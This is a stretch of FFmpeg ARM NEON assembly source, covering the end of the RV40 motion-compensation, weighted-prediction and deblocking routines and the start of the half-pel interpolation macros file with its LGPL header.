vmov.i8 d1, #20
bl \type\()_rv40_qpel8_v_lowpass_neon
vpop {d8-d15}
pop {r4, pc}
endfunc
@ mixed positions: 14-row scratch buffer on the stack, aligned to 8
function ff_\type\()_rv40_qpel8_mc11_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8 @ scratch: 14 packed 8-byte rows
add r12, sp, #7
bic r12, r12, #7 @ 8-byte-align the scratch pointer
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc21_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d0, #52 @ switch coefficients for the vertical pass
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc31_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vswp d0, d1
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc12_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d0, #20
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc22_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc32_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d1, #20
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc03_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub r1, r1, r2, lsl #1
vmov.i8 d0, #20
vmov.i8 d1, #52
bl \type\()_rv40_qpel8_v_lowpass_neon
vpop {d8-d15}
pop {r4, pc}
endfunc
@ mc33: half-pel in both directions == plain 2x2 pixel averaging
function ff_\type\()_rv40_qpel8_mc33_neon, export=1
mov r3, #8
b X(ff_\type\()_pixels8_xy2_neon)
endfunc
function ff_\type\()_rv40_qpel8_mc13_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
add r1, sp, #7
bic r1, r1, #7
vswp d0, d1
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
function ff_\type\()_rv40_qpel8_mc23_neon, export=1
push {r4, lr}
vpush {d8-d15}
sub sp, sp, #14*8
add r12, sp, #7
bic r12, r12, #7
sub r1, r1, r2, lsl #1
sub r1, r1, #2
mov r3, #12
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
add r1, sp, #7
bic r1, r1, #7
vmov.i8 d1, #52
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #14*8
vpop {d8-d15}
pop {r4, pc}
endfunc
@ 16x16 variants: four 8x16/8x8 passes over the quadrants
function ff_\type\()_rv40_qpel16_mc10_neon, export=1
vmov.i8 d0, #52
vmov.i8 d1, #20
.L\type\()_rv40_qpel16_h:
push {r1, lr}
sub r1, r1, #2
mov r3, #16
bl \type\()_rv40_qpel8_h_lowpass_neon
pop {r1, lr}
sub r0, r0, r2, lsl #4 @ rewind dst 16 rows, step to right half
add r0, r0, #8
add r1, r1, #6 @ right half: +8 pixels, -2 filter offset
mov r3, #16
b \type\()_rv40_qpel8_h_lowpass_neon
endfunc
function ff_\type\()_rv40_qpel16_mc30_neon, export=1
vmov.i8 d0, #20
vmov.i8 d1, #52
b .L\type\()_rv40_qpel16_h
endfunc
function ff_\type\()_rv40_qpel16_mc01_neon, export=1
vmov.i8 d0, #52
vmov.i8 d1, #20
.L\type\()_rv40_qpel16_v:
sub r1, r1, r2, lsl #1
push {r1, lr}
vpush {d8-d15}
bl \type\()_rv40_qpel8_v_lowpass_neon
sub r1, r1, r2, lsl #2 @ overlap: rewind 4 rows for lower half
bl \type\()_rv40_qpel8_v_lowpass_neon
ldr r1, [sp, #64] @ saved src (below 64-byte d8-d15 save area)
sub r0, r0, r2, lsl #4
add r0, r0, #8
add r1, r1, #8
bl \type\()_rv40_qpel8_v_lowpass_neon
sub r1, r1, r2, lsl #2
bl \type\()_rv40_qpel8_v_lowpass_neon
vpop {d8-d15}
pop {r1, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc11_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8 @ scratch: 2 columns x 21 packed rows, + alignment
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416] @ saved src: 44*8 scratch + 64-byte vpush below it
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
.L\type\()_rv40_qpel16_v_s6:
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
sub r1, r1, #40 @ overlap 5 packed rows for the lower quadrant
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
sub r0, r0, r2, lsl #4
add r0, r0, #8
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s6_neon
add sp, sp, #44*8
vpop {d8-d15}
pop {r1, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc21_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
vmov.i8 d0, #52
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc31_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vswp d0, d1
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc12_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vmov.i8 d0, #20
.L\type\()_rv40_qpel16_v_s5:
add r1, sp, #7
bic r1, r1, #7
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
sub r0, r0, r2, lsl #4
add r0, r0, #8
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
sub r1, r1, #40
bl \type\()_rv40_qpel8_v_lp_packed_s5_neon
add sp, sp, #44*8
vpop {d8-d15}
pop {r1, pc}
endfunc
function ff_\type\()_rv40_qpel16_mc22_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
b .L\type\()_rv40_qpel16_v_s5
endfunc
function ff_\type\()_rv40_qpel16_mc32_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #52
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vmov.i8 d1, #20
b .L\type\()_rv40_qpel16_v_s5
endfunc
function ff_\type\()_rv40_qpel16_mc03_neon, export=1
vmov.i8 d0, #20
vmov.i8 d1, #52
b .L\type\()_rv40_qpel16_v
endfunc
function ff_\type\()_rv40_qpel16_mc13_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #52
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s6_neon
vswp d0, d1
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc23_neon, export=1
sub r1, r1, r2, lsl #1
sub r1, r1, #2
push {r1, lr}
vpush {d8-d15}
sub sp, sp, #44*8
add r12, sp, #7
bic r12, r12, #7
mov r3, #20
vmov.i8 d0, #20
vmov.i8 d1, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
ldr r1, [sp, #416]
add r1, r1, #8
mov r3, #20
bl put_rv40_qpel8_h_lp_packed_s5_neon
vmov.i8 d1, #52
b .L\type\()_rv40_qpel16_v_s6
endfunc
function ff_\type\()_rv40_qpel16_mc33_neon, export=1
mov r3, #16
b X(ff_\type\()_pixels16_xy2_neon)
endfunc
.endm
@ Generate both the put_ and avg_ function families.
rv40_qpel put
rv40_qpel avg
@ Core of RV40 weighted prediction:
@   q1 = satu8(((src1 * w2) >> 9) + ((src2 * w1) >> 9) + 16) >> 5)
@ In:  q1 = src1 pixels, q2 = src2 pixels,
@      d0[0] = w1, d0[2] = w2 (packed by the callers below).
@ Result is left in q1; clobbers q2, q3, q8-q15.
.macro rv40_weight
vmovl.u8 q8, d2
vmovl.u8 q9, d3
vmovl.u8 q10, d4
vmovl.u8 q11, d5
vmull.u16 q2, d16, d0[2] @ src1 * w2
vmull.u16 q3, d17, d0[2]
vmull.u16 q8, d18, d0[2]
vmull.u16 q9, d19, d0[2]
vmull.u16 q12, d20, d0[0] @ src2 * w1
vmull.u16 q13, d21, d0[0]
vmull.u16 q14, d22, d0[0]
vmull.u16 q15, d23, d0[0]
vshrn.i32 d4, q2, #9
vshrn.i32 d5, q3, #9
vshrn.i32 d6, q8, #9
vshrn.i32 d7, q9, #9
vshrn.i32 d16, q12, #9
vshrn.i32 d17, q13, #9
vshrn.i32 d18, q14, #9
vshrn.i32 d19, q15, #9
vadd.u16 q2, q2, q8
vadd.u16 q3, q3, q9
vrshrn.i16 d2, q2, #5 @ rounding shift adds the +16 bias
vrshrn.i16 d3, q3, #5
.endm
/* void ff_rv40_weight_func_16_neon(uint8_t *dst, uint8_t *src1, uint8_t *src2,
int w1, int w2, int stride) */
@ Weighted average of two 16x16 blocks (prototype in the comment above).
@ r0 = dst, r1 = src1, r2 = src2, r3 = w1, [sp] = w2, [sp,#4] = stride.
function ff_rv40_weight_func_16_neon, export=1
ldr r12, [sp] @ w2
vmov d0, r3, r12 @ d0 = { w1, w2 } (lanes 0 and 2 as u16)
ldr r12, [sp, #4] @ stride
mov r3, #16 @ 16 rows, one per iteration
1:
vld1.8 {q1}, [r1,:128], r12
vld1.8 {q2}, [r2,:128], r12
rv40_weight
vst1.8 {q1}, [r0,:128], r12
subs r3, r3, #1
bne 1b
bx lr
endfunc
/* void ff_rv40_weight_func_8_neon(uint8_t *dst, uint8_t *src1, uint8_t *src2,
int w1, int w2, int stride) */
@ Weighted average of two 8x8 blocks (prototype in the comment above).
@ Same register layout as the 16-wide version; two rows per iteration.
function ff_rv40_weight_func_8_neon, export=1
ldr r12, [sp] @ w2
vmov d0, r3, r12 @ d0 = { w1, w2 }
ldr r12, [sp, #4] @ stride
mov r3, #8
1:
vld1.8 {d2}, [r1,:64], r12
vld1.8 {d3}, [r1,:64], r12
vld1.8 {d4}, [r2,:64], r12
vld1.8 {d5}, [r2,:64], r12
rv40_weight
vst1.8 {d2}, [r0,:64], r12
vst1.8 {d3}, [r0,:64], r12
subs r3, r3, #2
bne 1b
bx lr
endfunc
@ RV40 loop-filter strength decision for a horizontal edge.
@ In:  r0 = src, r1 = stride, r2/r3 = beta/beta2 thresholds,
@      [sp] = flag selecting the combined return value,
@      [sp,#4]/[sp,#8] = output pointers for the per-side strength
@      words (presumably p1/q1 - TODO confirm against the C caller).
@ Fast path: if the two rows adjacent to the edge are word-identical,
@ both outputs are zeroed and the function returns immediately.
function ff_rv40_h_loop_filter_strength_neon, export=1
pkhbt r2, r3, r2, lsl #18 @ pack halfwords { r3, r2 << 2 }
ldr r3, [r0]
ldr_dpre r12, r0, r1
teq r3, r12
beq 1f
sub r0, r0, r1, lsl #1
@ gather rows -3..2; d0/d4/d5 lane layout matches the vpaddl comments
vld1.32 {d4[]}, [r0,:32], r1 @ -3
vld1.32 {d0[]}, [r0,:32], r1 @ -2
vld1.32 {d4[1]}, [r0,:32], r1 @ -1
vld1.32 {d5[]}, [r0,:32], r1 @ 0
vld1.32 {d1[]}, [r0,:32], r1 @ 1
vld1.32 {d5[0]}, [r0,:32], r1 @ 2
vpaddl.u8 q8, q0 @ -2, -2, -2, -2, 1, 1, 1, 1
vpaddl.u8 q9, q2 @ -3, -3, -1, -1, 2, 2, 0, 0
vdup.32 d30, r2 @ beta2, beta << 2
vpadd.u16 d16, d16, d17 @ -2, -2, 1, 1
vpadd.u16 d18, d18, d19 @ -3, -1, 2, 0
vabd.u16 d16, d18, d16 @ |row sums| differences vs. neighbours
vclt.u16 d16, d16, d30 @ below-threshold flags
ldrd r2, r3, [sp, #4]
vmovl.u16 q12, d16
vtrn.16 d16, d17
vshr.u32 q12, q12, #15 @ normalise flags to 0/1
ldr r0, [sp]
vst1.32 {d24[1]}, [r2,:32]
vst1.32 {d25[1]}, [r3,:32]
cmp r0, #0
it eq
bxeq lr
@ combined strength: AND of all four per-position flags
vand d18, d16, d17
vtrn.32 d18, d19
vand d18, d18, d19
vmov.u16 r0, d18[0]
bx lr
1:
@ identical centre rows: zero both strength outputs
ldrd r2, r3, [sp, #4]
mov r0, #0
str r0, [r2]
str r0, [r3]
bx lr
endfunc
@ RV40 loop-filter strength decision for a vertical edge.
@ Same parameter layout as the horizontal version, but the six pixels
@ around the edge are gathered from 8-byte rows starting at src-3 and
@ summed down the 4 rows before thresholding.
function ff_rv40_v_loop_filter_strength_neon, export=1
sub r0, r0, #3
pkhbt r2, r3, r2, lsl #18 @ pack halfwords { r3, r2 << 2 }
vld1.8 {d0}, [r0], r1
vld1.8 {d1}, [r0], r1
vld1.8 {d2}, [r0], r1
vld1.8 {d3}, [r0], r1
vaddl.u8 q0, d0, d1
vaddl.u8 q1, d2, d3
vdup.32 q15, r2
vadd.u16 q0, q0, q1 @ -3, -2, -1, 0, 1, 2
vext.16 q1, q0, q0, #1 @ -2, -1, 0, 1, 2
vabd.u16 q0, q1, q0 @ adjacent column-sum differences
vclt.u16 q0, q0, q15 @ below-threshold flags
ldrd r2, r3, [sp, #4]
vmovl.u16 q1, d0
vext.16 d1, d0, d1, #3
vshr.u32 q1, q1, #15 @ normalise flags to 0/1
ldr r0, [sp]
vst1.32 {d2[1]}, [r2,:32]
vst1.32 {d3[1]}, [r3,:32]
cmp r0, #0
it eq
bxeq lr
@ combined strength: AND of the per-position flags
vand d0, d0, d1
vtrn.16 d0, d1
vand d0, d0, d1
vmov.u16 r0, d0[0]
bx lr
endfunc
@ RV40 "weak" deblocking filter core, shared by the h/v entry points
@ below.  Expects the edge pixels pre-packed by the caller:
@   d0 = src[-2] (both lanes), d1 = src[1] (both lanes),
@   d4 = { src[-3], src[-1] }, d5 = { src[2], src[0] }
@ r2/r3 = filter_p1/filter_q1 flags; remaining parameters on the
@ stack: alpha, beta, lim_p0q0, lim_q1, lim_p1 (see the loads below).
@ Produces the filtered -2..1 pixels back in d4/d5
@ ({-1,0} in d4, {-2,1} in d5 after the trailing vtrn/vswp dance).
.macro rv40_weak_loop_filter
vdup.16 d30, r2 @ filter_p1
vdup.16 d31, r3 @ filter_q1
ldrd r2, r3, [sp]
vdup.16 d28, r2 @ alpha
vdup.16 d29, r3 @ beta
ldr r12, [sp, #8]
vdup.16 d25, r12 @ lim_p0q0
ldrd r2, r3, [sp, #12]
vsubl.u8 q9, d5, d4 @ x, t
vabdl.u8 q8, d5, d4 @ x, abs(t)
vneg.s16 q15, q15
vceq.i16 d16, d19, #0 @ !t
vshl.s16 d19, d19, #2 @ t << 2
vmul.u16 d18, d17, d28 @ alpha * abs(t)
vand d24, d30, d31 @ filter_p1 & filter_q1
vsubl.u8 q1, d0, d4 @ p1p2, p1p0
vsubl.u8 q3, d1, d5 @ q1q2, q1q0
vmov.i16 d22, #3
vshr.u16 d18, d18, #7
vadd.i16 d22, d22, d24 @ 3 - (filter_p1 & filter_q1)
vsubl.u8 q10, d0, d1 @ src[-2] - src[1]
vcle.u16 d18, d18, d22
vand d20, d20, d24
vneg.s16 d23, d25 @ -lim_p0q0
vadd.s16 d19, d19, d20
vbic d16, d18, d16 @ t && u <= 3 - (fp1 & fq1)
vtrn.32 d4, d5 @ -3, 2, -1, 0
vrshr.s16 d19, d19, #3
vmov d28, d29 @ beta
vswp d3, d6 @ q1q2, p1p0
vmin.s16 d19, d19, d25 @ clamp the p0/q0 delta to +-lim_p0q0
vand d30, d30, d16
vand d31, d31, d16
vadd.s16 q10, q1, q3 @ p1p2 + p1p0, q1q2 + q1q0
vmax.s16 d19, d19, d23 @ diff
vabs.s16 q1, q1 @ abs(p1p2), abs(q1q2)
vand d18, d19, d16 @ diff
vcle.u16 q1, q1, q14 @ inner-pixel activity below beta?
vneg.s16 d19, d18 @ -diff
vdup.16 d26, r3 @ lim_p1
vaddw.u8 q2, q9, d5 @ src[-1]+diff, src[0]-diff
vhsub.s16 q11, q10, q9
vand q1, q1, q15
vqmovun.s16 d4, q2 @ -1, 0
vand q9, q11, q1
vdup.16 d27, r2 @ lim_q1
vneg.s16 q9, q9
vneg.s16 q14, q13
vmin.s16 q9, q9, q13 @ clamp p1/q1 deltas to +-lim_p1/lim_q1
vtrn.32 d0, d1 @ -2, 1, -2, 1
vmax.s16 q9, q9, q14
vaddw.u8 q3, q9, d0
vqmovun.s16 d5, q3 @ -2, 1
.endm
@ Weak deblocking of a horizontal edge: gather rows -3..2 of a 4-pixel
@ column into the lane layout rv40_weak_loop_filter expects, filter,
@ then write back the modified rows -2..1.
@ In: r0 = src (on the edge), r1 = stride; thresholds per the macro.
function ff_rv40_h_weak_loop_filter_neon, export=1
sub r0, r0, r1, lsl #1
sub r0, r0, r1 @ r0 = src - 3*stride
vld1.32 {d4[]}, [r0,:32], r1 @ row -3 (both lanes)
vld1.32 {d0[]}, [r0,:32], r1 @ row -2
vld1.32 {d4[1]}, [r0,:32], r1 @ row -1
vld1.32 {d5[]}, [r0,:32], r1 @ row 0
vld1.32 {d1[]}, [r0,:32], r1 @ row 1
vld1.32 {d5[0]}, [r0,:32] @ row 2
sub r0, r0, r1, lsl #2 @ rewind to row -2
rv40_weak_loop_filter
vst1.32 {d5[0]}, [r0,:32], r1 @ row -2
vst1.32 {d4[0]}, [r0,:32], r1 @ row -1
vst1.32 {d4[1]}, [r0,:32], r1 @ row 0
vst1.32 {d5[1]}, [r0,:32], r1 @ row 1
bx lr
endfunc
@ Weak deblocking of a vertical edge: load four 8-byte rows starting
@ at src-3, transpose the 4x8 patch into the macro's lane layout,
@ filter, then scatter the modified -2..1 columns back with vst4 lane
@ stores starting at src-2.
function ff_rv40_v_weak_loop_filter_neon, export=1
sub r12, r0, #3
sub r0, r0, #2
vld1.8 {d4}, [r12], r1
vld1.8 {d5}, [r12], r1
vld1.8 {d2}, [r12], r1
vld1.8 {d3}, [r12], r1
@ in-register transpose to the layout rv40_weak_loop_filter expects
vtrn.16 q2, q1
vtrn.8 d4, d5
vtrn.8 d2, d3
vrev64.32 d5, d5
vtrn.32 q2, q1
vdup.32 d0, d3[0]
vdup.32 d1, d2[0]
rv40_weak_loop_filter
vtrn.32 q2, q3
vswp d4, d5
vst4.8 {d4[0],d5[0],d6[0],d7[0]}, [r0], r1
vst4.8 {d4[1],d5[1],d6[1],d7[1]}, [r0], r1
vst4.8 {d4[2],d5[2],d6[2],d7[2]}, [r0], r1
vst4.8 {d4[3],d5[3],d6[3],d7[3]}, [r0], r1
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 13,431
|
ffmpeg-3.0.2/libavcodec/arm/hpeldsp_neon.S
|
/*
* ARM NEON optimised DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Copy (or, with \avg=1, average into) a 16-wide block, 4 rows per
@ iteration.  r0 = dst (16-byte aligned), r1 = src, r2 = stride,
@ r3 = height (multiple of 4).  \rnd is unused by the plain copy.
.macro pixels16 rnd=1, avg=0
.if \avg
mov r12, r0 @ second dst pointer for the read-modify-write
.endif
1: vld1.8 {q0}, [r1], r2
vld1.8 {q1}, [r1], r2
vld1.8 {q2}, [r1], r2
pld [r1, r2, lsl #2]
vld1.8 {q3}, [r1], r2
pld [r1]
pld [r1, r2]
pld [r1, r2, lsl #1]
.if \avg
vld1.8 {q8}, [r12,:128], r2
vrhadd.u8 q0, q0, q8
vld1.8 {q9}, [r12,:128], r2
vrhadd.u8 q1, q1, q9
vld1.8 {q10}, [r12,:128], r2
vrhadd.u8 q2, q2, q10
vld1.8 {q11}, [r12,:128], r2
vrhadd.u8 q3, q3, q11
.endif
subs r3, r3, #4
vst1.64 {q0}, [r0,:128], r2
vst1.64 {q1}, [r0,:128], r2
vst1.64 {q2}, [r0,:128], r2
vst1.64 {q3}, [r0,:128], r2
bne 1b
bx lr
.endm
@ 16-wide half-pel horizontal interpolation: each output pixel is the
@ average of src[x] and src[x+1] (vext supplies the shifted row).
@ "avg" expands to vrhadd (rounding) or vhadd (no_rnd) depending on
@ the enclosing pixfunc instantiation; \avg=1 additionally averages
@ with the existing destination.  Two rows per iteration.
.macro pixels16_x2 rnd=1, avg=0
1: vld1.8 {d0-d2}, [r1], r2
vld1.8 {d4-d6}, [r1], r2
pld [r1]
pld [r1, r2]
subs r3, r3, #2
vext.8 q1, q0, q1, #1 @ row shifted by one pixel
avg q0, q0, q1
vext.8 q3, q2, q3, #1
avg q2, q2, q3
.if \avg
vld1.8 {q1}, [r0,:128], r2
vld1.8 {q3}, [r0,:128]
vrhadd.u8 q0, q0, q1
vrhadd.u8 q2, q2, q3
sub r0, r0, r2
.endif
vst1.8 {q0}, [r0,:128], r2
vst1.8 {q2}, [r0,:128], r2
bne 1b
bx lr
.endm
@ 16-wide half-pel vertical interpolation: each output row is the
@ average of two consecutive source rows.  Software-pipelined: two
@ rows are preloaded, the loop handles h-2 rows, and the final pair
@ is emitted after the loop (hence the "sub r3, r3, #2").
.macro pixels16_y2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {q0}, [r1], r2
vld1.8 {q1}, [r1], r2
1: subs r3, r3, #2
avg q2, q0, q1
vld1.8 {q0}, [r1], r2
avg q3, q0, q1
vld1.8 {q1}, [r1], r2
pld [r1]
pld [r1, r2]
.if \avg
vld1.8 {q8}, [r0,:128], r2
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q2, q2, q8
vrhadd.u8 q3, q3, q9
sub r0, r0, r2
.endif
vst1.8 {q2}, [r0,:128], r2
vst1.8 {q3}, [r0,:128], r2
bne 1b
@ epilogue: last two output rows (only one more source row needed)
avg q2, q0, q1
vld1.8 {q0}, [r1], r2
avg q3, q0, q1
.if \avg
vld1.8 {q8}, [r0,:128], r2
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q2, q2, q8
vrhadd.u8 q3, q3, q9
sub r0, r0, r2
.endif
vst1.8 {q2}, [r0,:128], r2
vst1.8 {q3}, [r0,:128], r2
bx lr
.endm
@ 16-wide half-pel interpolation in both directions: 2x2 box filter
@ (sum of 4 pixels >> 2).  Row sums src[x]+src[x+1] are kept in
@ q8-q11 across iterations so each source row is summed only once.
@ "shrn" rounds (vrshrn) or truncates (vshrn); the NRND lines add the
@ +1 bias used only by the no-rounding variant.  Software-pipelined
@ with a two-row epilogue after the loop.
.macro pixels16_xy2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {d0-d2}, [r1], r2
vld1.8 {d4-d6}, [r1], r2
NRND vmov.i16 q13, #1
pld [r1]
pld [r1, r2]
vext.8 q1, q0, q1, #1
vext.8 q3, q2, q3, #1
vaddl.u8 q8, d0, d2 @ horizontal pair sums for row 0
vaddl.u8 q10, d1, d3
vaddl.u8 q9, d4, d6 @ ... and row 1
vaddl.u8 q11, d5, d7
1: subs r3, r3, #2
vld1.8 {d0-d2}, [r1], r2
vadd.u16 q12, q8, q9 @ 2x2 sum for the output row
pld [r1]
NRND vadd.u16 q12, q12, q13
vext.8 q15, q0, q1, #1
vadd.u16 q1 , q10, q11
shrn d28, q12, #2
NRND vadd.u16 q1, q1, q13
shrn d29, q1, #2
.if \avg
vld1.8 {q8}, [r0,:128]
vrhadd.u8 q14, q14, q8
.endif
vaddl.u8 q8, d0, d30
vld1.8 {d2-d4}, [r1], r2
vaddl.u8 q10, d1, d31
vst1.8 {q14}, [r0,:128], r2
vadd.u16 q12, q8, q9
pld [r1, r2]
NRND vadd.u16 q12, q12, q13
vext.8 q2, q1, q2, #1
vadd.u16 q0, q10, q11
shrn d30, q12, #2
NRND vadd.u16 q0, q0, q13
shrn d31, q0, #2
.if \avg
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q15, q15, q9
.endif
vaddl.u8 q9, d2, d4
vaddl.u8 q11, d3, d5
vst1.8 {q15}, [r0,:128], r2
bgt 1b
@ epilogue: final two output rows
vld1.8 {d0-d2}, [r1], r2
vadd.u16 q12, q8, q9
NRND vadd.u16 q12, q12, q13
vext.8 q15, q0, q1, #1
vadd.u16 q1 , q10, q11
shrn d28, q12, #2
NRND vadd.u16 q1, q1, q13
shrn d29, q1, #2
.if \avg
vld1.8 {q8}, [r0,:128]
vrhadd.u8 q14, q14, q8
.endif
vaddl.u8 q8, d0, d30
vaddl.u8 q10, d1, d31
vst1.8 {q14}, [r0,:128], r2
vadd.u16 q12, q8, q9
NRND vadd.u16 q12, q12, q13
vadd.u16 q0, q10, q11
shrn d30, q12, #2
NRND vadd.u16 q0, q0, q13
shrn d31, q0, #2
.if \avg
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q15, q15, q9
.endif
